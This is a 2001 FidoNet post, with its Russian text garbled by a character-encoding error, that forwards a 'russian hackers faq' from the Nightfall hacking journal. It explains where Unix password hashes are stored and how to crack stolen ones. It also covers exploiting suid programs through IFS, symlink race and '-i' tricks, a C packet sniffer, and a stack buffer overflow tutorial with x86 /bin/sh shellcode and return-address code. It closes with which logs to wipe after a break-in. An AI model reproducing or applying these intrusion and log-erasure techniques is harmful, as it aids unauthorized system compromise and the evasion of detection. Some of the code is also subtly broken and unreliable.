|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : Ilia Sprite 2:5080/112.7 10 Feb 2001 15:53:58
To : All
Subject : Ñòàòüÿ
--------------------------------------------------------------------------------
* Forwarded by Ilia Sprite (2:5080/112.7)
* Area : $HACKING$ ($HACKING$ received from 2:5080/112 on 17 Jan)
* From : Anton Yurchak, 2:463/1336.20@fidonet (Thursday February 08 2001 23:59)
* To : All
* Subj : Ñòàòüÿ
=============================================================================
*ýòî ñòàòüÿ èç îäíîãî èç æóðíàëîâ Nightfall. õî÷åøü âce æóðíàëû - îáðàùàéñÿ*
*íà ôàêñåðâåð Alien (ïî àäðåñàì 2:463/1336.20, 111:463/336.9, 2000:10/458.20)*
*(http://www.crosswinds.com/~alienind)*
> ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÜÜ ÛÛÛÛÛÛ ÜÜ
ÚÄÄ ÜÛÛÛÛ ÛÛÛ²²Û ÛÛ²²Ü ÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ=ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ+ÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ÞÛÛ²²Û ßÛÛÛÛÛ ÛÛÛÛÛÝ ³
³ ÛÛÛÛÛÛÛÜÜÜÜÜÜÜÛÛÛÛÛÛ ³
³ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ³
³ ßß ÜÜÜÜ ßßßßß ÜÜÜÜ ßß ³
³ ÜÛÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÛÜ russian hackers faq ³
Þ²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÝ version 0, revision 2 ³
ÜÜ Û²²ÛÛÛÛÛÛÛÛÛ²²ÛÛÛÛÛÛÛÛÛ ³
²²ÝÞÛÛÛÛÛÛßßÛÛÝÛ ÛÛÛÛÛÛÛÛ ÛÛ ³
ßÛÛÛÛÛÜÜÛß ßßßÛÛÛÛÛßßß ³
Ü ßßßß ÜÜÛÛÛÜÜÜÜÜÜÜß ³
³ ßÛÛ²²ÛÛÛßÛßÛÛÛÛÛß ³
³ ßÛÛÛÛÛÛÛÛÛÛÛß ³
³ ßÛÛÛÛÛ ß ³
ÀÄÄÄÄÄÄÄ ßÛÛßß ÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄ+ÄÄÄÄÄÄÄÄÄÄÄ=ÄÄÄÄÙ
àâòîpû: seltorn // alien industries
napalmed // alien industries
îôîpìëåíèå: seltorn // alien industries
ñîäåpæàíèå:
1. îáùàÿ èíôîpìàöèÿ
ú çà÷åì ýòîò FAQ?
ú àâòîpû, ñîñòàâèòåëè, êîíòàêòíàÿ èíôîpìàöèÿ
ú áëàãîäàpíîñòè
2. UNiX
ú ãäå æå ëåæàò ïàpîëè â UNiX-àõ?
ú à êàê ìíå âçëîìàòü ïàpîëè, åñëè ÿ èõ óæå óòÿíóë?
ú ÿ íàøåë suid-ïpîãpàììó. êàê ìíå åå çàõàêàòü?
ú ÷òî òàêîå ñíèôôåpû è êàê èõ ïèñàòü?
ú êàê æå ñpûâàòü ñòåê íà unix-ñèñòåìàõ?
ú êàê óñòpîåíû unix-îâûå ïpàâà?
ú ãäå ñåáÿ âû÷åpêíóòü ïîñëå ëîìà ñèñòåìû?
ÚÄÄÄÄÄÄ
1. îáùàÿ èíôîpìàöèÿ
Q: çà÷åì ýòîò FAQ?
A: ÷èòàÿ ôèäîøíûå è èíåòîâûå ýõè î õàêå ÿ ÷àñòî âñòpå÷àþ ìîpå òóïûõ âîï-
pîñîâ î ñîâåpøåííî î÷åâèäíûõ âåùàõ. ÷àñòî ñëûøó ïpèçûâû "íàïèøèòå FAQ
î õàêå" è íèêòî åãî íå ïèøåò. ru.nethack è ru.hacker FAQ äàâíî óñòà-
påëè. ýòîò FAQ ÿ íàäåþñü áóäåò æèòü è îáíîâëÿòüñÿ. çàïëàíèpîâàíûå på-
ëèçû - åæåìåñÿ÷íî. òåêóùàÿ âåpñèÿ faq áóäåò pàñïpîñòpàíÿòüñÿ ñ íàøèì
ýëåêòpîííûì æópíàëîì nightfall. ãîñïîäà ïpîôè! åñëè âû óñòàëè îò òó-
ïûõ âîïpîñîâ â ýõàõ è âàì íåêóäà ïîñûëàòü ÷àéíèêîâ - äîïîëíÿéòå ýòîò
ôàê.
Q: à êòî àâòîpû è êàê âàì íàïèñàòü?
A: íà ìîìåíò âûïóñêà ïåpâîé âåpñèè ôàêà ïèñàëè â íåãî òîëüêî ÿ, seltorn,
è napalmed. îáà ìû èç alien industries group. ÷åpåç íåäåëüêó-äpóãóþ ÿ
çàïóùó mailing list, ÷åpåç êîòîpûé ìîæíî áóäåò ïîñëàòü âîïpîñû, ïîëó-
÷àòü ñâåæèå påâèçèè íå pàç â ìåñÿö (êîãäà îí áóäåò çàêèäûâàòüñÿ íà
íàø ñàéò è ïî õàêåpñêèì ýõàì), à ïî ìåpå îáíîâëåíèÿ. ïîêà ÷òî äîïîë-
íåíèÿ è ïpåäëîæåíèÿ ïpèñûëàéòå ìíå íà s3@cd.sysda.kiev.ua. íîâûå âåp-
ñèè ôàêà åæåìåñÿ÷íî áóäóò âûêëàäûâàòüñÿ íà íàøåì ñàéòå.
èòàê åùå pàç.
påäàêòîp: s3@cd.sysda.kiev.ua
ñàéò: members.home.com/mrsigma
irc: efnet #!ai_
Q: áëàãîäàpíîñòè, ïpèâåòû, ò.ï. ÷òî çà âîïpîñ? :)
A: â ïîäãîòîâêå ýòîãî faq áûëî ñèëüíî ïîþçàíî #hack faq, æópíàëû phrack,
the hacker's choice mag è äpóãèå. îãpîìíîå ñïàñèáî âñåì, êòî îòîçâàë-
ñÿ íà irc è âûñêàçàë ñâîè ïîæåëàíèÿ î òîì, êàê äîëæåí âûãëÿäåòü faq.
ñïàñèáî wingmander-ó çà òî, ÷òî ìû ñ íàïàëìîì ñìîãëè çàñåñòü ó íåãî â
õàòå íà 6 ÷àñîâ è íàïèñàòü îñíîâó ýòîãî faq ïpåæäå ÷åì pàçúåõàòüñÿ ïî
ñâîèì äîìàì (ìû ñîáññíî æèâåì â pàçíûõ ãîpîäàõ).
îòäåëüíûå ïpèâåòû âñåé íàøåé êîìàíäå alien industries à òàêæå âñåì,
êîìó íå áåçpàçëè÷íî ñîñòîÿíèå ñîâêîâîãî underground-à.
ÚÄÄÄÄÄÄ
2. UNiX
Q: ãäå æå ëåæàò ïàpîëè â UNiX-àõ?
A: ñìîòpÿ ÷åãî òû õî÷åøü. â äpåâíèõ U*X ñèñòåìàõ ïàpîëè âñå åùå ëåæàò â
/etc/passwd, õîòÿ è â çàøèôpîâàíîì âèäå. à åñëè ñèñòåìà ñëåãêà íîâåå
è ïpîäâèíóòåå, òî â ôàéëå ïàpîëåé íà ïîëå "ïàpîëü" ñòîèò *, à ïàpîëè
ëåæàò â /etc/shadow èëè /etc/pwd.db â çàùèôpîâàíîì âèäå. âîò òàáëèöà
ïpîëåæèâàíèÿ ïàpîëåé â "îòòåíåííîì" âèäå:
ÚÄú ñèñòåìà úÄÄÄÄÄÄÂÄÄú ïóòü ê ôàéëó úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ AiX ³ /etc/security/passwd ³
³ *BSD 4.3+ ³ /etc/master.passwd ³
³ ConvexOs : /etc/shadow ³
³ DG/UX /etc/tcb/aa/user/ ³
³ EP/IX /etc/shadow :
³ OSF/1 /etc/passwd.dir èëè /etc/passwd.pag
³ IRIX : /etc/shadow
: System V 4.0 ³ /etc/shadow :
System V 4.2 ³ /etc/security/* ³
Linux ³ /etc/shadow ³
AiX 3 ³ /tcb/auth/files/<first letter of username>/<username> ³
Sco Unix ³ /tcb/auth/files/<first letter of username>/<username> ³
: SunOS 4.1+ ³ /etc/security/passwd.adjunct ³
³ SunOS 5 ³ /etc/shadow ³
³ UNICOS ³ /etc/udb ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Q: à êàê ìíå âçëîìàòü ïàpîëè, åñëè ÿ èõ óæå óòÿíóë?
A: äëÿ ýòîãî åñòü ìíîæåñòâî ïpîãpàìì. íàïpèìåp John the Ripper, Cracker-
Jack. åñëè ïîä póêîé åñòü ñâîé äîìàøíèé unix - ïîä íåãî Crack by Alec
Muffett.
Q: ÿ íàøåë suid-ïpîãpàììó. êàê ìíå åå çàõàêàòü?
A: åñòü íåñêîëüêî ìåòîäîâ. íàïpèìåp åñëè ìû çíàåì, ÷òî ïpîãpàììà çàïóñ-
êàåò âûçîâ òèïà system("/bin/ls"), òî ìîæíî ñìåíèòü IFS. IFS - inter-
nal field separator, pàçäåëèòåëü ïîëåé. â êàæäîì øåëëå îí íàñòpàèâà-
åòñÿ â pàçíûõ ìåñòàõ, îáùåãî påöåïòà íåòó. òàê âîò ïpè ñìåíå åíòîãî
IFS íà / ñèñòåìà ïîéìåò âûçîâ /bin/ls êàê "bin ls". ñòîèò òåïåpü íà-
ïèñàòü ïpîãpàììó bin, êîòîpàÿ áû äåëàëà ãpÿçíîå äåëî :) õîòÿ äëÿ îñ-
íîâíûõ shell-îâ âîò påöåïòû:
IFS='/';export IFS #bash
setenv IFS '/' #csh
export IFS='/' #ksh
åñòü íà ñâåòå åùå òàêàÿ âåùü, êàê race condition, êîãäà ìû îäíîâpå-
ìåííî çàïóñêàåì ïpîãpàììó è ëèíêóåì åãî ñ êàêèì-òî ìóñîpîì:
# nice -19 suidprog ; ln -s evilprog suidroot
åñòü åùå îäèí òàêîé õèòpîæ%#@é ôîêóñ, êàê ñëèíêîâàòü ïpîãpàììó ñ ôàé-
ëîì ïî èìåíè -i. åñëè óäàåòñÿ ýòî ñäåëàòü, òî ìû ìîæåì ñäåëàòü òàê:
% ln suid.sh -i
% -i
#
÷òî äàñò íàñ ïîíÿòíî ÷òî. êàê ýòî ïpîèñõîäèò? -i çàïóñêàåò èíòåpàê-
òèâíûé påæèì.
Q: ÷òî òàêîå ñíèôôåpû?
A: ñíèôôåp - ïpîãpàììà, êîòîpàÿ óòÿãèâàåò òpàôôèê, ïpîõîäÿùèé â äàííîì
ñåãìåíòå ñåòè. ïåpâûå àòàêè ñ èñïîëüçîâàíèåì ñíèôôåpîâ äàòèpóþòñÿ 94
ãîäîì.
êàê æå ôóíêöèîíèpóåò ñíèôôåp? íà ñâåòå åñòü òàêàÿ âåùü, êàê datalink.
ýòî òàêîé påæèì pàáîòû ñîêåòà, êîãäà ìû â ñîêåòå ìîæåì pàáîòàòü ñ ÷ó-
æèìè ïàêåòàìè. òàêîé påæèì èñïîëüçîâàíèÿ ñîêåòà òpåáóåò ïåpåêëþ÷åíèÿ
ñåòåâîé êàpòî÷êè â promiscious mode. òàê îòêpûâàåòñÿ ñîêåò äëÿ data-
link:
soquet = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP));
êàê òåïåpü ñ íåãî ÷èòàòü? ïpîñòî:
struct packet {
struct iphdr ipheader;
struct tcphdr tcpheader;
char data[2048];
}sniffdpacket;
bzero(&sniffpacket, sizeof(struct packet));
soquet = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP));
read(soquet, &sniffpacket, 2088);
syslog("from: %s, to: %s, source port %d, destination port %d.\n",
inet_ntoa(sniffpacket.ipheader.saddr),
inet_ntoa(sniffpacket.ipheader.daddr),
sniffpacket.tcpheader.source, sniffpacket.tcpheader.dest);
÷òî æå áóäåò äåëàòü íîpìàëüíûé ñíèôôåp? îí äîëæåí ñîáèpàòü èíôîpìàöèþ
î ïpîõîäÿùåé èíôîpìàöèè
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
main()
{
int paquet;
struct packet {
struct iphdr ipheader;
struct tcphdr tcpheader;
char data[2048];
}sniffpacket;
bzero(&sniffpacket, sizeof(struct packet));
paquet = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP));
while(1)
{
read(paquet,sniffpacket, 2088);
printf("src: %s, dest: %s, src p: %d, dst p: %d \n
inet_ntoa(sniffpacket.ipheader.saddr),
inet_ntoa(sniffpacket.ipheader.daddr),
sniffpacket.tcpheader.source,
sniffpacket.tcpheader.dest);
printf("here's the sniffed data:");
puts(sniffpacket.data);
}
}
âîò âàì ìèíèìàëüíûé ñíèôôåp. ÷òîáû ïpåâpàòèòü åãî â ïîëíîâåñíûé ñíèô-
ôåp, íóæíî äîáàâèòü àíàëèçàòîp, êîòîpûé áû âûêèäûâàë çàpàíåå íåíóæíûå
ïàêåòû.
áóêâàëüíî ìåñÿö íàçàä ïîÿâèëàñü óòèëèòà antisniff îò lopht. îíà äåéñ-
òâèòåëüíî îáíàpóæèâàåò ñàìûå ïpîñòûå ñíèôôåpû è óñïåøíî îá ýòîì ñîîá-
ùàåò. òàê êàê æå áûòü? ñîâåòóþ ïpî÷èòàòü ìîþ ñòàòüþ â æópíàëå night-
fall magazine.
Q: êàê æå ñpûâàòü ñòåê íà unix-ñèñòåìàõ?
A: íà÷íåì ñíà÷àëà. ÷òî æå òàêîå ñòåê? ýòî ïpîñòî êóñîê ïàìÿòè, ñïåöèôè-
÷åñêè îpãàíèçîâàíûé. êîãäà ïpîöåññîp îápàáàòûâàåò èíôîpìàöèþ, ïpîìå-
æóòî÷íóþ îí ñêëàäûâàåò â ñòåê. êàê æå ýòîò ñòåê óñòpîåí? äëÿ îïèñàíèÿ
åãî óñòpîéñòâà íåêîòîpûå óìåëüöû äàæå àáápåâèàòópó ïpèäóìàëè - LIFO.
çíà÷èë ýòî "last in, first out". ò.å. óäàëåíèå èäåò ñïåpåäè, à çàïèñü
â çàä :)
êàê æå áóäåò âûãëÿäåòü òåê ñpåäíåñòàòèñòè÷åñêîé ïpîãpàììû? ïpèìåpíî
òàê:
.....
.....
³ ..... ³
ÃÄÄÄÄ Ä Ä ÄÄ Ä ÄÄÄÄ Ä Ä´
1024 áàéò ³ ïåpåìåííûå ³ -1024 îò íà÷àëà
ÃÄÄ ÄÄÄ Ä ÄÄ ÄÄÄ Ä ÄÄ ÄÄ´
4 áàéò ³ áàçîâûé óêàçàòåëü ³ "0" ñòåêà
ÃÄÄ ÄÄ Ä ÄÄ ÄÄÄÄ Ä ÄÄÄ ´
4 áàéò ³ àäpåñ âîçâpàòà ³ +4 îò íà÷àëà
ÃÄ Ä ÄÄÄÄ Ä ÄÄ Ä Ä ÄÄÄÄ´
³ ..... ³
.....
.....
êàæäàÿ ñèñòåìà èñïîëüçóåò ñïåöèàëüíûé óêàçàòåëü íà påàëüíóþ ïîçèöèþ
ñòåêà. ýòîò óêàçàòåëü íàçûâàåòñÿ SP. ÷òî íàñ èíòåpåñóåò â pàáîòå, òàê
ýòî ïåpåìåííûå è àäpåñ âîçâpàòà. êàê æå íàì ñîáñòâåííî èñïîëüçîâàòü
ýòè çíàíèÿ î ñòåêå? à âîò êàê. íà ñâåòå åñòü äåñÿòîê ôóíêöèé, êîòîpûå
ïpè çàïèñè íå ïpîâåpÿþò ãpàíèöû ñòåêà. íàïpèìåp strcpy(). ïpè ïîìîùè
ýòîé ôóíêöèè ìû âñåãäà ìîæåì çàïèñàòü 1024 "îãîâîpåííûõ" áàéò è åùå 8
äëÿ íàøèõ áàíäèòñêèõ íóæä.
êàê óæå áûëî ñêàçàíî âûøå, äëÿ ïîëíîãî óäîâîëüñòâèÿ íåîáõîäèìî, ÷òîáû
ïpîãpàììà áûëà suid-íîé. îäíàêî ñîâñåì íå îáÿçàòåëüíî. åñëè íåîáõîäè-
ìî âëîìèòüñÿ â ñèñòåìó, à âõîäîâ íåò - ìîæíî ïîïpîáîâàòü ñêîpìèòü åé
buffer overflow è ïîëàçèòü õîòÿáû íà ìèíèìàëüíûõ ïpèâèëåãèÿõ.
÷òî æå íàì ñîáñòâåííî íåîáõîäèìî íàïèñàòü? íóæíà ïpîãpàììà, îòêîìïè-
ëèpîâàííàÿ è ïåpåâåäåííàÿ debugger-îì â ñèìâîëüíûé êîä. èìåííî ýòîò
êîä äîëæåí âûïîëíÿòü íåîáõîäèìûå íàì äåéñòâèÿ. ïpîñòîé ïpèìåp - ìû æå
ïpîñòî çàïóñêàåì /bin/sh:
char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
(àõõ, ÿ âïåpâûå íàpóøèë ôîpìàò ïîâåñòâîâàíèÿ :)))
ýòîò êîä äîëæåí áûòü íà êîíöå íàøåé ïåpåìåííîé, ïîñëå ÷åãî èäåò ÷åòû-
på áàéòà ìóñîpà è àäpåñ âîçâpàòà. êóäà? íà íàø êîä ïî çàïóñêó /bin/sh
èëè ÷åãî åùå :) âîò àññåìáëåpíûé èñõîäíèê äëÿ ïåpåêîìïèëÿöèè íà äpó-
ãèõ ïëàòôîpìàõ:
jmp end_of_code
execve: popl %esi
movl %esi,0x8(%esi)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%esi),%ecx
leal 0xc(%esi),%edx
int $0x80
xorl %ebx,%ebx
movl %ebx,%eax
inc %eax
int $0x80
end_of_code: call exec_prog
.string "/bin/sh\"
êàê âû âèäèòå, âñå äîñòàòî÷íî ïpîñòî. îñòàåòñÿ pîâíî îäíà ïpîáëåìà -
êóäà æå ïpûãàòü ñ return address? âîò ôóíêöèÿ get_sp, êîòîpàÿ âûäàåò
íàì stack pointer:
long get_sp()
{
__asm__("movl %esp,%eax");
}
÷òî äàëüøå? âîò ñîáñòâåííî íîâûé óêàçàòåëü, ïîñëå êîòîpîãî ìîæíî ñïî-
êîéíî ïpûãàòü íàçàä íà 4 + length(shellcode):
ptr2=(long *)ptr;
for(i=1;i<8;i++)
*(ptr2++)=get_sp()+offset;
áëàãîäàpÿ èçâpàòíîñòè êîäà ïpè íåïpàâèëüíîì ïpûæêå è âîçâpàòå áóäåò 7
àëüòåpíàòèâíûõ ìåñò êóäà ïpûãàòü.
äëÿ òåõ, êòî õî÷åò áîëåå äåòàëüíûõ îáüÿñíåíèé ýòîé ìåòîäèêå - phrack
#49, ñòàòüÿ 14 îò aleph1.
Q: êàê óñòpîåíû unix-îâûå ïpàâà?
A: äîñòàòî÷íî ïpîñòî. âîò êàê âûãëÿäèò îòîápàæåíèå ïpàâ ïî ls:
sh[seltorn]$ ls -l warezz
-rwxr--r-- 1 seltorn users 15 Aug 12 30:21 warezz
äëÿ òåõ, êòî íå çíàåò, -l äàåò ïîëíóþ èíôîpìàöèþ î âûâîäèìûõ ôàéëàõ.
òåïåpü ñîáñòâåííî î ïåpâîì âûâîäèìîì ïîëå - ïpàâàõ è ïàpàìåòpàõ. ïåp-
âûé ñèìâîë - òèï ôàéëà:
[-] îáû÷íûé ôàéë
[b] ñïåö. áëîê-ôàéë
[c] ñïåö. ñèìâîëüíûé ôàéë
[d] äèpåêòîpèÿ
[l] ñèìâîëüíàÿ ñâÿçêà (link)
[p] "òpóáà"
[s] ñîêåò
äàëüøå èäóò òpè ãpóïïû ïî òpè ñèìâîëà - rwx (read, write, execute)
äëÿ âëàäåëüöà, r-- (read, no write, no execute) äëÿ ãpóïïû, â êîòîpóþ
âêëþ÷åí ïîëüçîâàòåëü è r-- (read, no write, no execute) äëÿ âñåõ îñ-
òàëüíûõ.
âû íàâåpíÿêà âèäåëè ïpàâà â ÷èñëåííîì ôîpìàòå. ÷èñëåííîå ïpåäñòàâëå-
íèå rwx ïpåîápàçîâûâàåòñÿ òàê:
read = 4
write = 2
execute = 1
ïpàâà âûãëÿäÿò êàê òpè öèôpû - ñóììà ïåpâîé ãpóïïû (âëàäåëåö), ñóììà
âòîpîé ãpóïïû (ãpóïïà âëàäåëüöà) è ñóììà òpåòåé ãpóïïû (âñå îñòàëüíûå
ïîëüçîâàòåëè). ò.å. rwxr--r-- áóäåò ñóììèpîâàòüñÿ â 744 (4+2+1,4,4).
âîò êàê ïpåîápàçîâûâåòñÿ êîìáèíàöèè â ñóììû:
ÚÄú ïpàâà úÄÄÄ-ÄÄÄÄÄ-ÄÄ-Ä-ÄÄú öèôpû ú-ÄÄÄÄú ñèìâîëû úÄ¿
³ ³
³ òîëüêî ÷òåíèå 4 r-- ³
³ òîëüêî çàïèñü 2 -w- ³
³ òîëüêî çàïóñê 1 --x ³
³ ÷òåíèå è çàïèñü 6 rw- ³
³ ÷òåíèå è çàïóñê 5 r-x ³
³ ÷òåíèå, çàïèñü è çàïóñê 7 rwx ³
ÀÄÄ--ÄÄ-ÄÄÄÄ-ÄÄÄÄÄ-Ä-ÄÄÄÄÄ--ÄÄÄÄÄ-ÄÄÄÄ-ÄÄÄÄÄÄ-ÄÄ-ÄÄÄÄÄÙ
Q: ãäå ñåáÿ âû÷åpêíóòü ïîñëå ëîìà ñèñòåìû?
A: ïåpâûå òpè ìåñòà:
utmp â /etc, /var/adm, /usr/adm, /usr/var/adm, /var/log
wtmp òàì æå
lastlog òàì æå, êpîìå /etc.
åùå íåâpåäíî ïîêèëÿòü ëîãè îáîëî÷êè (íàïpèìåp .cshlog äëÿ c shell).
âîò åùå ñîâåò ýêñêëþçèâíî îò napalmed, êîòîpîãî óæå òpèæäû ëîâèëè:
"îáÿçàòåëüíî ïpîâåpÿéòå ôàéë /etc/syslog.conf è âñå ôàéëû, â íåì óïî-
íàþòñÿ. ÎÁßÇÀÒÅËÜHÎ!" :)
-+-
+ Origin: Æåñòàìè ìàëü÷èê îáüÿñíÿë, ÷òî åãî çîâóò Õóàí (2:463/1336.20)
=============================================================================
Çäðàâñòâóéòå.
áûëî áû ðàçóìíî äîïîëíèòü FAQ ñ ðàçðåøåíèÿ âûøåóïîìÿíóòûõ ãîñïîä.
Tidelly pom...
--- http://www.securityelf.net
* Origin: VGA Planets BBS (2:5080/112.7)
Âåðíóòüñÿ ê ñïèñêó òåì, ñîðòèðîâàííûõ ïî: âîçðàñòàíèå äàòû óìåíüøåíèå äàòû òåìà àâòîð
| Òåìà: |
Àâòîð: |
Äàòà: |
|
Ñòàòüÿ |
Ilia Sprite |
10 Feb 2001 15:53:58 |
 Re: Ñòàòüÿ |
Comoderator |
10 Feb 2001 21:18:01 |
 Ñòàòüÿ |
Ilia Sprite |
11 Feb 2001 00:13:28 |
|
Re: Ñòàòüÿ |
Comoderator |
11 Feb 2001 16:50:01 |
|
|
